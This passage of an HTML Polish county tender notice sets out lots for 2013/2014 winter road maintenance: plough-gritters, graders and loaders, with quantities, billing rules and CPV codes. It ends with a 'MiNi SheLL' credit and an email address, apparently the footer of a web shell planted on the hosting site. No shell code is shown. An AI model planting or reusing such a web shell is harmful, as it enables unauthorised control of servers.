           Przyjmuje się naliczenie akcji czynnej od chwili wydania dyspozycji do chwili 
           zakończenia akcji    tj. wykonania powierzonego zadania.

         b.  akcja bierna  - polegająca na dyżurze operatora  sprzętu   w stanie  gotowości do 
                                       ewentualnego  prowadzenia akcji  czynnej.

5. Rozliczenie usług

    a. rozliczenie usług będzie się odbywało według cen jednostkowych  brutto  w akcji czynnej 
        i biernej.

b. wartość  godziny  biernej  (w akcji biernej).

    Zamawiający ustala na kwotę  10,00 zł  brutto. słownie złotych; dziesięć złotych 00/100

    c. należność (wynagrodzenie)   jest sumą  iloczynów  cen jednostkowych i wykonanych usług 
       (potwierdzonych przez zamawiającego w raportach pracy)   w akcji czynnej i biernej.
      Rozliczenie  usługi za prowadzenie akcji czynnej  nastąpi  na podstawie rejestratora 
      aparatury kontrolno-pomiarowej GPS za faktycznie odśnieżone odcinki dróg..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.63.00.00-2, 90.62.00.00-9, 93.90.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.04.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Świadczenie usług przy zimowym utrzymaniu dróg 
                                      powiatowych  pługopiaskarką.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Zapotrzebowanie:
1. pługopiaskarki  -  1 jednostka sprzętowa

2. Do realizacji zamówienia Wykonawca zapewni:

a. piaskarkę - pojemność załadunku ok. 4 m3
b. nośnik - samochód  o ładowności  minimum 8 ton  (min. dwie osie napędowe)  
c. pług jednostronny lemieszowy - sterowany hydraulicznie z kabiny kierowcy z dociskiem oraz możliwością skrętu - 1 szt.

 3.    Przewidywane ilości  usług  w sezonie 2013/2014

a.  pługopiaskarka   
- akcja czynna -   10.000,00   km
- akcja bierna  -        250  godz.

Podane powyżej ilości usług  są tylko ilościami  przewidywanym, zależą od warunków  atmosferycznych  i mogą  ulec zmianie. 
      
4.  Świadczenie usług przy zimowym utrzymaniu dróg

   a. akcja czynna - polegająca na usuwaniu śniegu oraz zwalczaniu śliskości 
                                materiałami   uszorstniającymi  na drogach powiatowych.
  
           Przyjmuje się naliczenie akcji czynnej od chwili wydania dyspozycji do chwili 
           zakończenia akcji    tj. wykonania powierzonego zadania.

         b.  akcja bierna  - polegająca na dyżurze operatora  sprzętu   w stanie  gotowości do 
                                       ewentualnego  prowadzenia akcji  czynnej.
5. Rozliczenie usług
    a. rozliczenie usług będzie się odbywało według cen jednostkowych  brutto  w akcji czynnej 
        i biernej.

b. wartość  godziny  biernej  (w akcji biernej).

    Zamawiający ustala na kwotę  10,00 zł  brutto. słownie złotych; dziesięć złotych 00/100

    c. należność (wynagrodzenie)   jest sumą  iloczynów  cen jednostkowych i wykonanych usług 
       (potwierdzonych przez zamawiającego w raportach pracy)   w akcji czynnej i biernej.
      Rozliczenie  usługi za prowadzenie akcji czynnej  nastąpi  na podstawie rejestratora 
      aparatury kontrolno-pomiarowej GPS za faktycznie odśnieżone odcinki dróg..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.63.00.00-2, 90.62.00.00-9, 93.90.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.04.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Świadczenie usług przy zimowym utrzymaniu dróg 
                                       powiatowych  pługopiaskarką  oraz zapewnienie  placu 
                                      składowego na terenie gminy Radków lub Moskorzew 
                                      do składowania mieszanki piaskowo-solnej   wraz 
                                      z załadunkiem  na piaskarki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Zapotrzebowanie:
1    pługopiaskarka  -  2 jednostki sprzętowe

2. Do realizacji zamówienia Wykonawca zapewni:

a.    piaskarkę - pojemność załadunku minimum 4 m3 - 2 szt.
b.    nośnik - samochód o ładowności  minimum 8 ton  (min. dwie osie napędowe) - 2 szt.              
c.	 pług jednostronny lemieszowy  sterowany hydraulicznie  z kabiny  kierowcy  
      z dociskiem oraz możliwością skrętu - 2 szt. 
d.	 plac składowy do składania mieszanki piaskowo- solnej
e.	 koparko - ładowarka  1 - jednostka sprzętowa wraz z obsługą

 3.    Przewidywane ilości  usług  w sezonie 2013/2014

a. pługopiaskarka   
- akcja czynna -   10.000,00   km
- akcja bierna  -        250  godz.
      b.  - 5 miesięcy składowania
           - 100 załadunków 

Podane powyżej ilości usług  są tylko ilościami  przewidywanym, zależą od warunków  atmosferycznych  i mogą  ulec zmianie. 
      
4.  Świadczenie usług przy zimowym utrzymaniu dróg

   a. akcja czynna - polegająca na usuwaniu śniegu oraz zwalczaniu śliskości 
                                materiałami    uszorstniającymi  na drogach powiatowych.
                              - polegająca na załadunku materiałów ( mieszanki piasku  z solą ) 
                                materiał dostarcza Zamawiający / dotyczy ppk. b)
  
           Przyjmuje się naliczenie akcji czynnej od chwili wydania dyspozycji do chwili 
           zakończenia akcji tj. wykonania powierzonego zadania.

         b.  akcja bierna  - polegająca na dyżurze operatora  sprzętu   w stanie  gotowości do 
                                      ewentualnego  prowadzenia akcji  czynnej.

5. Rozliczenie usług
    a. rozliczenie usług będzie się odbywało według cen jednostkowych  brutto  w akcji czynnej 
        i biernej.

    b. wartość  godziny  biernej  (w akcji biernej).

    Zamawiający ustala na kwotę 10,00 zł  brutto. słownie złotych; dziesięć złotych 00/100

    c. należność (wynagrodzenie)   jest sumą  iloczynów  cen jednostkowych i wykonanych usług 
       (potwierdzonych przez zamawiającego w raportach pracy)   w akcji czynnej i biernej.
      Rozliczenie  usługi za prowadzenie akcji czynnej  nastąpi  na podstawie rejestratora 
      aparatury kontrolno-pomiarowej GPS za faktycznie odśnieżone odcinki dróg..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.63.00.00-2, 90.62.00.00-9, 93.90.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.04.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Odśnieżanie dróg powiatowych  na terenie Powiatu 
                                    Włoszczowskiego  równiarką.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Zapotrzebowanie - 1 jednostka sprzętowa

   Do realizacji zamówienia Wykonawca zapewni 1 równiarkę 
   Zamawiający wymaga aby równiarka wyposażona była w czołowy pług dwustronny.


2. Świadczenie usług  
    Świadczenie usług  będzie się odbywało jednym rodzajem akcji  -   akcja czynna 
           

akcja czynna -    polegająca na usuwaniu śniegu   na drogach powiatowych  
                                    Przyjmuje się naliczenie akcji czynnej od chwili wydania dyspozycji do 
                                 chwili zakończenia akcji    tj. wykonania powierzonego zadania.


3.  Przewidywana ilość  usług w sezonie zimowym 2013/2014 - 150 godz.


     Podana powyżej ilość usług  jest ilością przewidywaną , zależy od 
     warunków  atmosferycznych  i może  ulec zmianie. 

4.  Rozliczenie usług będzie się odbywało według ceny jednostkowej brutto:
      w akcji czynnej                  ......... zł /  godz.


Należność (wynagrodzenie)   jest iloczynem  ceny  jednostkowej i czasu pracy sprzętu (akcja czynna) potwierdzonego przez zamawiającego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.63.00.00-2, 90.62.00.00-9, 93.90.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.04.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Odśnieżanie dróg powiatowych  na terenie Powiatu 
                                    Włoszczowskiego  równiarką.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Zapotrzebowanie - 1 jednostka sprzętowa

   Do realizacji zamówienia Wykonawca zapewni 1 równiarkę 
   Zamawiający wymaga aby równiarka wyposażona była w czołowy pług dwustronny.

2. Świadczenie usług  
    Świadczenie usług  będzie się odbywało jednym rodzajem akcji  -   akcja czynna 
           

	akcja czynna -    polegająca na usuwaniu śniegu   na drogach powiatowych  
                                    Przyjmuje się naliczenie akcji czynnej od chwili wydania dyspozycji do 
                                  chwili zakończenia akcji    tj. wykonania powierzonego zadania.


3.  Przewidywana ilość  usług w sezonie zimowym 2013/2014 - 150 godz.


     Podana powyżej ilość usług  jest ilością przewidywaną , zależy od 
     warunków  atmosferycznych  i może  ulec zmianie. 

4.  Rozliczenie usług będzie się odbywało według ceny jednostkowej brutto:
      w akcji czynnej                  ......... zł /  godz.


Należność (wynagrodzenie)   jest iloczynem  ceny  jednostkowej i czasu pracy sprzętu (akcja czynna) potwierdzonego przez zamawiającego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.63.00.00-2, 90.62.00.00-9, 93.90.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.04.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Odśnieżanie dróg powiatowych  na terenie Powiatu 
                                    Włoszczowskiego  ładowarką typu FADROMA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Zapotrzebowanie - 1 jednostka sprzętowa

   Do realizacji zamówienia Wykonawca zapewni   1  ładowarkę  typu FADROMA  o pojemności 
   łyżki 3 m3


2.  Świadczenie usług   będzie się odbywało jednym rodzajem akcji  -  akcja czynna 
           
	akcja czynna -    polegająca na usuwaniu śniegu   na drogach powiatowych  
                                   Przyjmuje się naliczenie akcji czynnej od chwili wydania dyspozycji do 
                                 chwili zakończenia akcji    tj. wykonania powierzonego zadania.


3. Przewidywana ilość  usług w sezonie zimowym 2013/2014  - 150 godz.

Podana powyżej ilość usług  jest ilością   przewidywaną  , zależy od warunków  atmosferycznych  i może   ulec zmianie. 

4. Rozliczenie usług będzie się odbywało według ceny jednostkowej brutto:

     w akcji czynnej                  ......... zł / godz.


Należność (wynagrodzenie)   jest iloczynem  ceny  jednostkowej i czasu pracy sprzętu (akcja czynna) potwierdzonego przez zamawiającego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.63.00.00-2, 90.62.00.00-9, 93.90.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.04.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Świadczenie usług  przy zimowym utrzymaniu dróg powiatowych
                                 ładowarko - koparka.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Zapotrzebowanie :
   1   ładowarko-koparka - 1 jednostka sprzętowa

   Do realizacji zamówienia Wykonawca zapewni:
 a.  ładowarko - koparka wraz z operatorem  - 1 szt. ( samojezdna o pojemności łyżki załadunku 
      powyżej 0,2 m3.)

2.  Świadczenie usług   będzie się odbywało jednym rodzajem akcji  -  akcja czynna 
           
	akcja czynna -   polegająca na załadunku piaskarek mieszanką piaskowo-solną, wykonanie 
                         mieszanki piasku z solą , hołdowanie materiałów na składowisku.
                                   Przyjmuje się naliczenie akcji czynnej od chwili wydania dyspozycji do 
                                 chwili zakończenia akcji    tj. wykonania powierzonego zadania.
                                Ponadto w razie wystąpienia takiej konieczności może być wykorzystana 
                                przy załadunku śniegu nagromadzonego przy ulicach powiatowych na 
                                środki transportu, a także przy odśnieżaniu dróg.

3. Przewidywana ilość  usług w sezonie zimowym 2013/2014  - 600 godz.

Podana powyżej ilość usług  jest ilością   przewidywaną  , zależy od warunków  atmosferycznych  i może   ulec zmianie. 

4. Rozliczenie usług będzie się odbywało według ceny jednostkowej brutto:

     w akcji czynnej                  ......... zł / godz.


Należność (wynagrodzenie)   jest iloczynem  ceny  jednostkowej i czasu pracy sprzętu (akcja czynna) potwierdzonego przez zamawiającego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.63.00.00-2, 90.62.00.00-9, 93.90.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.04.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com